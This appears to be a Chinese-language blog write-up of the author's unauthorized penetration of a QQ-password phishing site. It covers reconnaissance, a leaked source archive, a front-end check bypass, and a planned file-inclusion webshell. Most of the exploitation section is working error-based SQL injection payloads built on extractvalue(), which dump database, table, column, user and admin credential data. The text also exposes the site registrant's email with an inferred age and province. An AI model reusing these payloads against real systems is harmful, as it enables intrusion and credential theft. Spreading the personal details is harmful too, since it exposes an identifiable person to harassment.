一、信息收集

在一個風和日麗的下午，突然在我們專業群里面有位同學發來一個二維碼要收集信息，說需要微信掃描后填寫信息

像這種二維碼，這種介紹，一眼就看出它不是好東西。閑的沒事干的我，就準備爆入它，剛好給我這小白練練手。果不其然。這種假頁面，就是不法分子用來收集信息的，而且除了能輸入外，底下的忘記密碼和注冊新賬號根本點不動。啊，太假了。不知道害了多少人。

這里我直接用了一個信息收集網站，輸入域名后自動收集，用nmap掃了掃。信息收集網站：TideFinger 潮汐指紋 TideFinger 潮汐指紋

操作系統：Linux（操作系統也可以直接將域名中隨便一個字母改變大小寫看網站反應，linux大小寫敏感會報錯，windows不敏感）

中間件：nginx

后端語言：php

ip：45.xxx.xxx.xxx(美國)

開放端口：21/tcp open ftp

80/tcp open http

888/tcp open accessbuilder

域名注冊人郵箱：26618xxxxx@qq.com（搜了一下是貴州的，今年19歲）

目錄掃描：2.rar(我下載下來是源碼泄露了，先不管這個，黑盒測試一波)

二、漏洞發現

看見這輸入框我就想注入，先不管其他的，試試再說。瀏覽器開啟的代理，準備用burp攔截，但是burp還沒有反應，瀏覽器這邊提示必須輸入數字。由此判斷是前端限制。

這里可以直接瀏覽器f12刪除type="number"繞過前端限制。接下來burp攔截。

網站直接報錯，反應頭還提示為什么錯，直接暴露表和字段，可能debug沒關。

直接報錯注入，用extractvalue()

（1）條件1：secure_file_priv無限制

（2）條件2：目錄權限可讀

（3）限制：extractvalue()函數最多讀取32個字符

payload：'and(select extractvalue(1,concat(0x7e,(select database()))))直接拼接在u后面，數據庫是w01

訪問url/2.rar下載壓縮包，解壓發現是網站源碼

發現w1是網站后臺需要賬戶密碼

三、漏洞利用

接下來就好辦多了

數據庫版本是5.6.50（information_schema保存了MySQL服務器所有數據庫的信息。 如數據庫名，數據庫的表(mysql 5.0以上有)，5.0以下只能通過爆破猜表名字段）

查數據庫名：u='and(select extractvalue(1,concat(0x7e,(select database()))))

爆表名：u='and(select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))))

爆字段名：u='and(select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="TABLE_NAME"))))

爆數據：u='and(select extractvalue(1,concat(0x7e,(select group_concat(COIUMN_NAME) from TABLE_NAME))))

因為之前回應頭注釋已經暴露了表名和字段，也可以直接查。這就是他們收集的QQ號密碼了（因為extractvalue()函數最多讀取32個字符可以使用limit在后面限制輸出，第一個數字代表從第幾行數據輸出，第二個數字代表輸出幾行數據）

payload：u='and(select extractvalue(3,concat(0x7e,(select user_name from cc_users limit 0,1 ))))#

爆相應的密碼

payload：u='and(select extractvalue(3,concat(0x7e,(select user_psw from cc_users limit 0,1 ))))#

當然，通過源碼泄露我直接收集了所有表名

回到我們的源碼，后臺登錄的地方，直接代碼審計，發現后臺賬戶密碼在cc_admins這張表里面

報錯注入把所有字段都爆出來

payload：u='and(select extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name="cc_admins" limit 0,1))))#（改變0到7，爆出8個字段）

報錯注入把對應字段的數據爆出來

payload：u='and(select extractvalue(1,concat(0x7e,(select f_userName from cc_admins limit 0,1))))#(改變字段值)

f_id, f_userPwd（e19d5cd5af0378da05f63f891c7467a）, f_userName（admin），f_groupid（1）, f_status（1）, f_tag（100），f_psw（abcd1234），f_reg_time（1533386669）

用sqlmap跑不動，我也不知道為啥，只能手動注入了

賬號：admin 密碼：abcd1234。成功進入后臺，后臺記錄著受騙者的QQ和密碼還有其他重要信息。

這里報錯得到了網站絕對路徑,但是mysql不是root權限，沒辦法插入一句話木馬得到webshell

通過審計代碼發現有一個備份王，在網上搜索相關漏洞沒找出來

但是發現在/config/sbak/phomebak.php這個文件中發現$mypath可控，跟進代碼

這個Ebak_BakExe函數沒有對mypath做任何過濾處理就包含了，想到了%00截斷后面路徑，這樣上傳帶木馬的圖片就可以利用這個文件包含漏洞，但是前提是先能找到這個備份王的賬號密碼，沒有辦法直接跳過登錄，訪問這個頁面。

就在我正要進行下一步的時候，他跑路了.................

后臺有一個可以上傳文件的地方，但是我沒有看出來有什么漏洞。

四、總結

????????入一半突然沒了。先是通過信息收集，網站源碼泄露下載到源碼，發現網站后臺路徑。然后通過網站收集qq密碼的頁面發現了報錯注入，由此得到了后臺賬號和密碼，進入后臺。通過源碼審計發現”備份王“的文件包含漏洞，接下來準備再通過注入得到”備份王“的賬號和密碼，然后就可以利用這個漏洞，再在后臺嘗試文件上傳漏洞，如果可以。兩個洞配合拿到websell。可惜啊！他跑路了。無了。

我也不知道他收集qq和密碼有什么目的，現在登錄qq都需要手機端驗證，有可能撞庫其他什么平臺密碼。

總結

以上是生活随笔為你收集整理的【漏洞挖掘】QQ钓鱼网站实战渗透的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。